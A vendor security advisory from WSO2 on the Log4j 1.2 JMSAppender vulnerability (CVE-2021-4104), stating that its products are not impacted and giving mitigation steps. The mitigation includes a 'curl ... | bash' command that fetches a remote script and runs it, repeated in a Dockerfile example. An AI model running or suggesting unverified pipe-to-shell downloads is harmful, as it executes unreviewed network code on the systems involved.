WSO2 impacted: No
Evidence of compromise: No
Customers actions required: No
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default.
Exploitation of CVE-2021-4104 requires the ability to modify Log4j configuration files (log4j.xml/ log4j.properties) and restart the WSO2 product. This requires access to the file system of the server with write permissions to relevant product configuration files. Therefore, it’s unlikely that an external attacker could perform CVE-2021-4104 exploitation.
In order to check if JMSAppender is used in any configuration files, run the following command from the product-home (without quotes): "grep -R 'org\.apache\.log4j\.net\.JMSAppender'"
If you prefer to remove JMSAppender from all Log4j version 1 dependencies found within WSO2 products, you may use the following mitigation steps.
- Ensure that you have "zip" and "unzip" commands installed on the server hosting the product.
- You can follow any of the following options
- Option 1: Navigate to the product-home folder and run the following command (without quotes): "curl https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/JMSAppender-remover.sh | bash"
- Option 2:
- Download the script from https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/JMSAppender-remover.sh
- Copy the script into the product-home
- Run the script from product-home, using the following command (without quotes): "bash JMSAppender-remover.sh"
- After executing the above script, restart the product.
The mitigation script will remove "org/apache/log4j/net/JMSAppender.class" from all Log4j version 1 dependencies found within the folder (and associated sub-folders) once this script is executed. After applying the fix, please ignore the "ClassNotFoundException" exception for the "JMSAppender" class which could occur during the product startup.
If you are using Docker images in your deployment, it's advised to create a new Docker image, running the provided script as an additional build step of the image.
Example Docker images for Ubuntu based distributions:
FROM wso2/wso2is:5.10.0 USER root RUN \ apt-get update \ && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \ zip \ && rm -rf /var/lib/apt/lists/* USER wso2carbon RUN curl https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/JMSAppender-remover.sh | bash
We will update this announcement if further actions are required.